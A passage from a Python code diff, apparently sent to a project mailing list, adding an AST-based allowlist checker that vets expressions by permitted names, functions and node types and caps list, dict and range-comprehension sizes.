+        Only import statements and expression statements are inspected here;
+        other statement kinds are left to the caller's tree traversal.
+        """
+        for stmt in node.body:
+            if isinstance(stmt, ast.Import):
+                if not self._check_import(stmt):
+                    return False
+            elif isinstance(stmt, ast.ImportFrom):
+                if not self._check_importfrom(stmt):
+                    return False
+            elif isinstance(stmt, ast.Expr):
+                if not self.is_safe_node(stmt.value):
+                    return False
+        return True
+
+    def _get_attribute_name(self, node):
+        """
+        Get the dotted name of an attribute chain rooted at a Name.
+
+        When the chain is rooted at something else (a call, a subscript, ...)
+        only the attribute name itself is returned.
+        """
+        if isinstance(node.value, ast.Name):
+            return "{}.{}".format(node.value.id, node.attr)
+        elif isinstance(node.value, ast.Attribute):
+            return "{}.{}".format(self._get_attribute_name(node.value), node.attr)
+        return node.attr
+
+    def is_safe_node(self, node):
+        """
+        Check if a node and all its children are safe.
+
+        Only the checks registered for the node's own type are applied. The
+        check functions read type-specific fields (``node.func``,
+        ``node.value``, ``node.names``), so calling them on other node types
+        would raise AttributeError instead of producing a verdict.
+        """
+        for node_type, check_func in self.custom_checks().items():
+            if isinstance(node, node_type) and not check_func(node):
+                return False
+        for child in ast.iter_child_nodes(node):
+            if not self.is_safe_node(child):
+                return False
+        return True
+
+class CustomRule(RuleTemplate):
+    """
+    A custom rule implementation that allows specific constructs and provides
+    custom checks for list comprehensions and container sizes.
+    """
+
+    # Size limits enforced by custom_checks().
+    MAX_LIST_ELEMENTS = 10
+    MAX_DICT_KEYS = 5
+
+    def allowed_names(self):
+        """Return a set of allowed variable names."""
+        return {'custom_var', 'another_var', 'x'}  # 'x' added for list comprehension
+
+    def allowed_functions(self):
+        """Return a set of allowed function names."""
+        return {'safe_function', 'range'}  # 'range' added for list comprehension
+
+    def allowed_node_types(self):
+        """Return a set of allowed AST node types."""
+        node_types = {
+            ast.List, ast.Dict, ast.ListComp, ast.comprehension,
+            ast.Compare, ast.BinOp, ast.BoolOp, ast.And, ast.Or,
+            ast.Eq, ast.Gt, ast.Lt, ast.Mod,
+            ast.Name, ast.Load, ast.Store, ast.Call,
+        }
+        node_types.update(self._literal_node_types())
+        return node_types
+
+    def custom_checks(self):
+        """Return size-limit checks for list literals, dict literals and list comprehensions."""
+        return {
+            ast.List: lambda node: len(node.elts) <= self.MAX_LIST_ELEMENTS,
+            ast.Dict: lambda node: len(node.keys) <= self.MAX_DICT_KEYS,
+            ast.ListComp: self._check_list_comp,
+        }
+
+    @staticmethod
+    def _literal_node_types():
+        """Return the AST node types this interpreter uses for literal values."""
+        if hasattr(ast, 'Constant'):
+            return {ast.Constant}
+        # Older grammars (including Python 2.7) have no ast.Constant and
+        # represent numbers and strings as ast.Num / ast.Str.
+        return {ast.Num, ast.Str}
+
+    @staticmethod
+    def _literal_int(node):
+        """Return the value of an integer literal node, or None for anything else."""
+        if hasattr(ast, 'Constant'):
+            if not isinstance(node, ast.Constant):
+                return None
+            value = node.value
+        else:
+            if not isinstance(node, ast.Num):
+                return None
+            value = node.n
+        # bool is a subclass of int; range(True) is not a size we want to reason about.
+        if isinstance(value, bool) or not isinstance(value, int):
+            return None
+        return value
+
+    def _range_call_length(self, iter_node):
+        """
+        Return how many items ``range(...)`` with literal integer arguments
+        yields, or None when ``iter_node`` is not such a call.
+        """
+        if not (isinstance(iter_node, ast.Call)
+                and isinstance(iter_node.func, ast.Name)
+                and iter_node.func.id == 'range'):
+            return None
+        # Keyword, *args or **kwargs arguments make the bounds unknowable here.
+        if (iter_node.keywords
+                or getattr(iter_node, 'starargs', None)
+                or getattr(iter_node, 'kwargs', None)):
+            return None
+
+        bounds = [self._literal_int(arg) for arg in iter_node.args]
+        if not 1 <= len(bounds) <= 3 or None in bounds:
+            return None
+
+        if len(bounds) == 1:
+            start, stop, step = 0, bounds[0], 1
+        elif len(bounds) == 2:
+            start, stop, step = bounds[0], bounds[1], 1
+        else:
+            start, stop, step = bounds
+        if step == 0:
+            return None  # range() itself rejects a zero step
+
+        # Normalise to a positive step so one formula covers both directions.
+        if step > 0:
+            span = stop - start
+        else:
+            span, step = start - stop, -step
+        if span <= 0:
+            return 0
+        return (span + step - 1) // step
+
+    def _check_list_comp(self, node):
+        """
+        Check that a list comprehension produces at most MAX_LIST_ELEMENTS items.
+
+        Every generator must iterate over ``range`` with literal integer
+        bounds; the generator lengths are multiplied, and ``if`` filters are
+        ignored (they can only shrink the result).
+        """
+        total = 1
+        for generator in node.generators:
+            length = self._range_call_length(generator.iter)
+            if length is None:
+                return False  # If we can't determine the size, consider it unsafe
+            total *= length
+        return total <= self.MAX_LIST_ELEMENTS
+
+
+


---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]


Reply via email to